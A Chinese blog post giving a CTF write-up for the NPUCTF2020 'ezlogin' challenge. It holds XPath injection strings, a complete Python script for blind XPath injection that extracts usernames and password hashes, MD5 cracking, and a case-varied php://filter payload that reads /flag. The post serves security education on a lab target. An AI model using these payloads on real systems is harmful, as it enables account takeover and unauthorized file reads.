[NPUCTF2020]ezlogin (xpath盲注)

于 2023-03-26 13:54:51 发布
阅读量652 收藏 4
点赞数 4
分类专栏: # web安全 文章标签: 安全 web安全 网络安全 xml python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129777163
版权

目录

前提知识

xpath基本语法

xpath注入基础

[NPUCTF2020]ezlogin

信息收集

Xpath盲注

前提知识

xpath基本语法

表达式           描述

nodename    选取此节点的所有子节点。

/                    从根节点选取。

//                    从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。

 .                     选取当前节点。

..                    选取当前节点的父节点。

@                   选取属性。

路径表达式     结果

bookstore       选取 bookstore 元素的所有子节点。

/bookstore    选取根元素 bookstore。

注释:假如路径起始于正斜杠( / ),则此路径始终代表到某元素的绝对路径!

bookstore/book    选取属于 bookstore 的子元素的所有 book 元素。

//book    选取所有 book 子元素,而不管它们在文档中的位置。

bookstore//book    选择属于 bookstore 元素的后代的所有 book 元素

//@lang    选取名为 lang 的所有属性。

通配符                 描述

*                           匹配任何元素节点。

@*                       匹配任何属性节点。

node()                  匹配任何类型的节点。

没有注释,不能像sql一样,用注释杀掉后面语句

xpath注入基础

见上篇文章

浅谈Xpath注入漏洞_coleak的博客-CSDN博客

' or 1=1 or ''='

']|//*|//*['

 

//users/user[loginID/text()=''or 1=1 or ''='' and password/text()='' or 1=1 or ''='']

[NPUCTF2020]ezlogin

信息收集

main.js

 var data = "<username>"+username+"</username>"+"<password>"+password+"</password>"+"<token>"+token+"</token>"; 
    $.ajax({
        type: "POST",
        url: "login.php",
        contentType: "application/xml",
        data: data,
        anysc: false,
        success: function (result, status, xhr) {
          if(result == '成功'){
            window.location.href = 'admin.php';  
          }
          $(".msg").text(result);
          
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });

直接访问admin.php被重定向到index.php

提交后抓包看看

X-Requested-With: XMLHttpRequest

Content-Type: application/xml

这里看到XML自然联想到XXE和Xpath,再一看应该是xpath

Xpath盲注

尝试万能密码,非法操作

判断节点数测试

'or count(/)=2  or ''='     ###根节点数量为2
'or count(/)=1  or ''='     ###根节点数量为1

正确的时候返回非法操作,错误时显示用户名或密码错误,典型的盲注特征

抓包看看提交的内容编写payload

<username>'or substring(name(/*[1]), {X}, 1)='{Y}'  or ''='</username><password>1</password><token>{token}</token>    //这个playload会返回第一个节点的名称

 在<username>里面的{X}中的X是一个变量,它指的是查询的元素X个字符,Y也是一个变量,是指我们猜测的字符,如果X=Y那么就会返回true,对应的我们的题目就会返回“非法操作!”

要注意的是,因为页面会不断的刷新,这个token的值也会一直变化,所以我们要保证每次请求数据都要拿到最新的token,name函数返回的是这个节点的元素名称。

去前端拿到token,生成正则

find = re.compile(r'<input type="hidden" id="token" value="(.*?)" />',re.S)

盲注当然要用py脚本

import requests
import re
import time

session = requests.session()
url = "http://d892dbc8-6dca-4922-b353-a9322a234bc0.node4.buuoj.cn:81/"
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
head = {
    'Content-Type': 'application/xml',
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
        }
find = re.compile(r'<input type="hidden" id="token" value="(.*?)" />',re.S)
result = ""
#猜测根节点名称
payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测子节点名称
payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测accounts的节点
payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#猜测user节点
payload_4 ="<username>'or substring(name(/root/accounts/user/*[3]), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
#跑用户名和密码
payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"
payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>1</password><token>{}</token>"

def get_token():     #获取token的函数
    resp = session.get(url=url)  #如果在这里用headers会得到超时的界面
    token = find.findall(resp.text)[0]
    #print(token)
    return token

for x in range(1,100):
    for char in chars:
        time.sleep(0.2)
        token = get_token()
        playload = payload_password.format(x, char, token)   #根据上面的playload来改
        #print(playload)
        resp = session.post(url=url,headers=head, data=playload)
        #print(resp.text)
        if "非法操作" in resp.text:
            result += char
            print(result)
            break
    if "用户名或密码错误" in resp.text:
        break

print(result)

这里时间睡眠需要在0.2或者以上,否则会获取不到token而报错哦;

chars可以根据情况调整优先位置可以更快的跑出来

跑出来大概是这样

<root>
      <accounts>
            <user>
                  <id></id>
                  <username>guster</username>
                  <password>e10adc3949ba59abbe56e057f20f883e</password>
            </user>
            <user>
                  <id></id>
                  <username>adm1n</username>
                  <password>cf7414b5bdb2e65ee43083f4ddbc4d9f</password>
            </user>
      </accounts>
</root>

MD解密cf7414b5bdb2e65ee43083f4ddbc4d9f得到gtfly123

MD5 在線免費解密 MD5、SHA1、MySQL、NTLM、SHA256、SHA512、Wordpress、Bcrypt 的雜湊

登录

Welcome!

ZmxhZyBpcyBpbiAvZmxhZwo=

flag is in /flag

/admin.php?file=/flag
?file=file:///flag

用伪协议

php://filter/convert.base64-encode/resource=/flag

依然被拦截

?file=PHP://filter/convert.Base64-Encode/resource=/flag

查看源码获得字符串,base64解密获得flag

coleak
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
xpath注入与盲注
RMC131的博客
04-19 988
XPath是一种查询语言,描述如何在XML文档中查找特定元素(包括属性、处理指令等),于SQL相似,Xpath可以引用XML文档的几乎任何部分,而不受访问控制限制。XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据,在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种攻击适用情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,与SQL盲注相似。
XPath盲注简介
weixin_34232617的博客
02-02 204
本文主要介绍代码注入攻击的一种特殊类型:XPath 盲注。 如果您不熟悉 XPath 1.0 或需要了解基础知识,请查看 W3 Schools XPath 教程。您还可以在 developerWorks 上找到大量的关于在各种语言环境中使用 XPath 的文章。本文使用的示例主要针对 XPath 1.0,但是也可用于 XPath 2.0。XPath 2.0 实际上增加了您可能遇到...
XPath注入
fortoscer的博客
11-26 334
XPath是一种查询语言,描述如何找到特定元素(包括属性,处理指令等)的XML文档英寸 因为它是一个查询语言,XPath是有点类似于结构化查询语言(SQL),然而,XPath是不同的,因为它可以用来表示一个XML文档的几乎任何部分,而不受访问控制限制。在SQL中,“用户”(这是在XPath / XML环境不确定的术语)可以被限制在特定的数据库,表,列或查询。使用XPath注入攻击中,攻击者可以修改XPath查询来执行他选择的动作。
[NPUCTF2020]ezlogin
怪味巧克力的博客
07-16 1171
0x01 首页如上,是一个登录的页面,而且这个页面是有时间限制的,超过一定时间没登录就需要刷新页面重新登录。我们抓包看看 登录的时候一个session只能存在一定的时间,通过抓包的内容来看,这里要用到Xpath的知识点 关于Xpath参考https://www.cnblogs.com/backlion/p/8554749.html xpath注入主要有两种,一种是普通的注入,另外一种是布尔注入。普通注入对应union注入,使用|来完成和union类似的功能,布尔注入则是布尔盲注。 这里使用大佬的脚本爆破
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
(2020谷歌浏览器插件xpath).zip
03-23
2020年最新使用,XPath Helper可以支持在网页点击元素生成xpath,整个抓取使用了xpath、正则表达式、消息中间件、多线程调度框架的chrome插件。
谷歌浏览器XPath2.0插件
06-23
XPath Helper插件是一款可以安装到谷歌浏览器上使用支持所有chrome内核浏览器的爬虫网页解析工具,使用XPath Helper可以让你轻松获取HTML元素的xPath,不用再手动获取捕捉。
xpath-helper.zip
01-16
xpath-helper
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
xpath-helper for MAC
06-14
Xpath helper 2.0.2,适用于MAC版, 提供的了压缩包,下载后,解压缩-打开chrome->更多工具->扩展程序->加载已经解压的扩展程序->找到解压的文件夹选中,此时会发现地址栏后面多了一个“X”的图标,此时F12,点击...
BUUCTF--[NPUCTF2020]ezlogin
qq_46263951的博客
07-28 498
进入页面后是一个登录页面 几番尝试后没啥发现,尝试抓包 判断是一个Xpath数据,这里需要使用xpath注入 先学习一下Xpath注入 这里使用大佬的脚本进行探测 import requests import re import time session = requests.session() url = "http://391bfefa-8949-4535-8129-07c86723c6b9.node4.buuoj.cn" chars = "ABCDEFGHIJKLMNOPQRST..
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 414
xPATH
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 575
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
full xpathxpath
最新发布
09-11
full xpathxpath是在进行网页元素定位时使用的两种不同的路径表示方法。 xpath是一种相对路径,用于定位网页元素的位置。它通过使用元素的标签名称、属性、层级关系等信息来描述元素的位置。使用xpath可以灵活地定位网页上的元素。 full xpath是一种绝对路径,它包含了从根节点到目标元素的完整路径。full xpath可以确保准确地找到目标元素,但它可能会比较冗长。 在使用full xpathxpath时,可以通过浏览器的开发者工具(F12)来获取元素的路径。在Elements选项卡中,选择想要选择的元素,右键点击并选择copy xpath或copy full xpath即可获取对应的路径。 虽然full xpathxpath都可以定位元素,但在实际使用中,一般推荐使用相对路径(xpath)来定位元素,因为相对路径更灵活、易于维护,并且可以避免因网页结构的变化而导致路径失效。 综上所述,full xpathxpath是两种不同的网页元素定位路径表示方法,其中xpath是一种相对路径,而full xpath是一种绝对路径。根据实际情况选择合适的路径来定位元素会更加方便和灵活。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值